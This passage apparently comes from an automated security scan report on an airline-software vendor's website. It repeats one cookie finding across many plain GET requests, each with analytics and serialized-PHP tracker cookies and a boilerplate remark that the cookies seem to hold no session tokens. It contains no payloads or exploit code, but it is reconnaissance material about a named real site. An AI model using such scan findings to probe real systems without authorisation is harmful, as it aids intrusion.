exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/aircentre_technology/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/control_cost HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/downloads HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/downloads/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323199; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fenterprise_operations%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/manage_change HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/manage_change/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323055; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fairline_reservations%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A75%3A%22%2Fproducts_services%2Fcommercial_planning%2FSabre_AirVision_Market_Intelligence%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/my_list HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/my_list/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/sabre_aircentre_crew HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_crew/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322606; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/sabre_aircentre_flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_flight/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322608; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A1%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/enterprise_operations/sabre_aircentre_maintenance HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_maintenance/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322616; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A2%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/frequent_flyer_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/frequent_flyer_management/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322591; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/gds_electronic_ticketing HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/gds_electronic_ticketing/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322598; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproducts_services%2Fsabresonic_sell%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_accounting%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/interact_interface HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/interact_interface/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322600; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/interline_electronic_ticketing_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/interline_electronic_ticketing_hub/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322597; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_web%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/multitask_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/multitask_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322603; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fcorporate_management%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fincludes%2Fform_issues%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/agency_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322640; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/agent_sales_report HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322643; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/credit_suite HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322803; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_manager%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/electronic_ticketing HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322838; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/multitask_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322877; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
